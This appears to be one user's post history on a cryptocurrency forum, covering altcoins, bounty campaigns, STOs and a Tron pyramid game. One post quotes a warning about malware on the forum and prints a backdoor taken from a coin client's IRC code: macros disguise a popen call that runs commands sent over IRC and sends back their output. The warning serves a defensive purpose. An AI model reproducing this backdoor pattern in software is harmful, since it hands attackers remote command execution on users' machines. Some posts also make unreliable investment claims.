41  Alternate cryptocurrencies / Altcoin Discussion / Re: Drunk Millioinaire - A sleeping giant?! on: September 19, 2021, 08:33:41 PM
Drunk millionaire is fast asleep and reading memory this is some crypto currency and we should not follow or buy it, as it will take your money and run away. All profiles are created and a lot of trackers are purchased for informational and confidence purposes only to the new entrants in the market. Get away from it now before you lose all your money.
42  Alternate cryptocurrencies / Altcoin Discussion / Re: Beware of Increasingly Sophisticated Malware Infection Attempts on: September 19, 2021, 08:27:59 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
So much malware now and more and more sophisticated we need to be wary and can you share some coin software or some project to keep people alert and stay away , because I think this is something we should all do and share together.
43  Alternate cryptocurrencies / Altcoin Discussion / Re: SHIB the new tough competitor to DOGE on: September 18, 2021, 09:54:25 AM
It was a surprise when the Shiba coin was listed in coinbase in the UK. And now i also own 2 million shiba coins and i think that if a doge coin can increase that amount of discipline, shiba coins can still do this. In this crazy crypto market we can't predict what will happen in the future.
44  Alternate cryptocurrencies / Altcoin Discussion / Re: Reasons for being in crypto. on: September 18, 2021, 09:47:10 AM
1. If you are in for the tech, what is the problem your favorite project is solving?

2. If you are for the profit, how are you generating one with the coins in your portfolio?
I will choose 2 options that are option 1 and 2. The first thing is that I really love technology and it makes people modern, convenient and useful in life, the second part is to do make my life easier every time I trade and make a profit. Back in the day when I just joined the cryptocurrency market, I just thought that this was a hobby and found it very interesting and now now it has become my life.
45  Alternate cryptocurrencies / Speculation (Altcoins) / Re: Take the RISK , You will win the RACE on: September 16, 2021, 01:59:26 PM
Beginners should understand that crypto is a big risk. It seems to me that they don't understand this matter and they think that it is impossible to lose money in crypto. But this is not so. I'm ready to take risks to get a big profit. Never forget that you must invest only money that you can afford to lose.
46  Alternate cryptocurrencies / Altcoin Discussion / Re: The popularity of the Bittorrent token caused Binance problems on: September 16, 2021, 01:53:59 PM
Despite people slagging off the Bittorrent token, demand was such to cause system problems on Binance.

Looks like people are still interested in more, and quicker download times for, porn files.

https://cryptomenow.com/binance-ceo-demand-for-bittorrent-token-was-so-high-it-caused-a-system-issue/
I think these problems were artificial ones to emphasize the popularity of bittorrent ICO. It's very obvious that binance is involved in market making for BTT and it's much easier to manipulate the price if you have majority of tokens by yourself. Are there many people who were in time to participate in ICO? My friends and I weren't able to get in during the ICO. Maybe you were?

48  Alternate cryptocurrencies / Speculation (Altcoins) / Re: The bull market is almost here on: February 20, 2019, 11:38:25 PM
Nothing has been changed on the global scale. This growth is just common reaction of the market to so long fall. I always laugh when the community is so extremely positive and excited about so small local pumps.
49  Alternate cryptocurrencies / Altcoin Discussion / Re: Ethereum (ETH) is still the long-term investment option number 1 on: February 20, 2019, 11:34:03 PM
I don't think Ethereum is still number one. Perhaps for many investors this is so, but some prefer other altcoins. But what is certain is that almost everyone still holds Ethereum.

I suppose the focus of community shifts to another dapp platforms like tron, eos and others. Ethereum stuck with a very slow TPS and it could eventually kill the advantage of being a top project.
50  Alternate cryptocurrencies / Altcoin Discussion / Re: 15 Proven Ways To Earn Money From Cryptocurrencies In 2019 on: February 20, 2019, 11:29:35 PM
Bear market is almost the best time to build your own projects in this sphere, because when the bulls come you should be prepared to earn as much as possible with ONLY legit ways, because the percentage of scam in crypto is overwhelmingly high. Save your carma)
51  Alternate cryptocurrencies / Altcoin Discussion / Re: How to make money on cryptocurrency in 2019 on: February 19, 2019, 08:47:37 PM
Let's start with the fact that just after almost a year and a half not many can earn money on bounty, and this is a very ungrateful job. I think this year the situation will not change, and it will be still difficult to make money on bounty.

What to do? Is there a way out?

Yes, there is one single way out, this is work on yourself for free, spend all the time that goes to the bounty for self-education, the study of new trends, those that require intellectual activity.

For example, out of 1,000 people performing the bounty, 70% will continue to fulfill them in the hope that in the future they will get rich. 25% will simply come out of this whole story and the cryptocurrency for them will only be experience and memory. But only 5% will understand that this niche is only developing, and experts, experts in their field are required here, they will start exploring other ways of making money, it could be programming, marketing. And of these 5% only 5 people will not give up and will work hard to reach their goal.

What I am talking about, people give up very easily, without even trying, losing their chance to gain experience, possible earnings. If you just think about the fact that very low% of people really try to achieve something, then theoretically everyone can achieve anything, you just need to make the effort and time.

Thus, those people who may not even be very capable, but they have motivation, they understand that nothing is impossible, they reach heights.

I did not try to convince anyone or something else, I just wanted to talk, to express my opinion on this matter.

I wish you good luck and patience!

Great speech, dude!
I suppose every person should find new opportunities all the time. Self education is wonderful way to spend time, especially during the bear season. Everybody should try to be an optimist to be able to achieve success, no matter how difficult it is. It's our live and this is all we have. So don't miss your chance Wink
52  Alternate cryptocurrencies / Service Discussion (Altcoins) / Re: Bounty hunters, please be patient. on: February 19, 2019, 08:41:20 PM
The worst thing for me as a bounty hunter - when bounty manager changes the rewards distribution method from fixed to staked or vice versa. In my opinion every bounty campaign should follow their own rules very strict without any significant and unnecessary deviation.
53  Alternate cryptocurrencies / Altcoin Discussion / Clash royale dapp is a Tron Village clone on: February 19, 2019, 08:35:09 PM
Hey folks, I've just found a new dapp with Tron Village mechanics. It's only 6 days old with 71 member and 1300000TRX in reserve. The smart contract is exactly the same with Tron Village.

Tron Village smart contract: https://tronsmartcontract.space/#/interact/TCPFHFk9VHjTVVdzK4qFTTUmAyv9VwbJmr
Clash Royale smart contract: https://tronsmartcontract.space/#/interact/TNqUbRSSUCWGC68w6fVPc2e28y9oKhuKqN

Tron Village  url: tronvillage.com
Clash Royale url: main: clash-royale.pw | Mirror 1: clash-ro.pw

It doesn't look fair to copy-paste the entire project, but as we know it's pretty usual thing for the crypto space with innumerous forks. Plus it uses Clash Royale art and brand - I guess without permission and it's some kind of red flag as well. In contrary the same smart contract means it's fully reliable and transparent - this is a good point.

I wonder what do you think about that? Would you invest in this pyramid-based game with small amount of participants in hope it will repeat the success of Tron Village? Huh
54  Alternate cryptocurrencies / Altcoin Discussion / Re: New project in 2019? on: February 16, 2019, 02:11:33 PM
How many new projects have you entered earlier this year? As much as in 2018?, please give your opinion about the new project that is currently available. Let's discuss its potential for the long term. Thank you.

Zero. It's not safe to invest to new projects during so bearish market. The risk of loss is much higher than the chance to get reward. Wait for a bit more and save your money through this uneasy period.
55  Alternate cryptocurrencies / Altcoin Discussion / Re: Learn to trust at least someone on: February 16, 2019, 02:07:29 PM
It is only when you cannot trust yourself, that you will find it hard to trust others.

➡️The life we are in is too short. You may have some valuable things in your possession that you need to entrust with someone.

➡️There are those who use escrows and they have had successful deals using them.  To an extent they have been able to trust them.

➡️Your cryptocurrency portfolio might contain some valuable assets, that when you are no more and there is no other person whom you have entrusted the security details with, they will all be gone and wasted.

➡️Had it been Quadriga CEO, in the person of Gerald Cotten, had someone he trusted during his life time, perhaps, there would not have been any loss of fund. A lot of people would have been happy and would continue to bless his late memory.

➡️If it is possible, you can insure your portfolio, exchanges can insure the assets of users and the likes. Perhaps that will help to avert an unbearable occurrence.

★ Learn to trust someone, even amidst all odds, so that people will say good about you when you are gone.

In my opinion this situation with Quadriga CEO is extremely stupid. If you're a CEO of any exchange and you're smart enough you MUST think about different possibilities which can happen by accident. Hell, if you're not CEO but normal human you'd probably think about some kind of plan B in case you're suddenly gone.
56  Alternate cryptocurrencies / Altcoin Discussion / Re: Ethereum over take ripple again in market capitalization! on: February 16, 2019, 02:02:06 PM
If we extrapolate the tendency we can assume for 99% that ripple will outperform ethereum in future. There is no sense to keep attention if eth on the second place or not. It doesn't worth it.
57  Alternate cryptocurrencies / Altcoin Discussion / Re: SEC is helping on: February 16, 2019, 01:53:38 PM
The more the SEC cracks down on unregistered securities posing as ICOs ,the more the atmosphere in crypto will change .IMO , ICOs will not die but they will definitely have to take a new form and STOs will play a big role. I believe this is a gods thing for the industry.

ICO/STO form of crowdfunding is totally different from any other model. It brings so many new features and opportunities, so if we can prevent scam attempts it could become a very powerful and major way to make a new startup in future.
58  Alternate cryptocurrencies / Altcoin Discussion / Re: Will the era change from ICO (Initial Coin Offering) to STO (Security Token O) on: February 16, 2019, 01:50:04 PM
I believe in STOs future, finally investors are really interested in investing because STO give them passive income. Bytheway there are many more cool STOs: FABA, MOBU, BoltonCoin.

Thank you for information. I'll add them.

Take a look at ICObench, they have had a new section of STOs for a pretty long time already. I don't believe ICO (now STO) trackers, because all of them could have their own interest in promotion of any project they list, but it's not that bad way to know new STO projects from them.
59  Alternate cryptocurrencies / Altcoin Discussion / Re: JPM coin is a threat to the Ripple's XRP? What will be the fate of XLM? on: February 16, 2019, 01:42:14 PM
JPM is not a competitor to ripple or stellar. JPM is just a centralized dollar backed crypto of one bank. It's one of the biggest banks on the planet earth, but still it's only one bank. Ripple aims to be a crypto for a network of banks. It's totally different thing. XRP and XLM will not die - I give you 1000% guarantee.
60  Alternate cryptocurrencies / Altcoin Discussion / Re: Tron Village on: February 15, 2019, 09:03:40 PM
I've started to play today, let's try it by myself. Of course it's a pyramid scheme and the previous players rewards based only on new players, but still there is a high possibility to invite new users to this area by this kind of gamified ponzy solutions. The main thing is that new players should fully realize what is it and how it works.
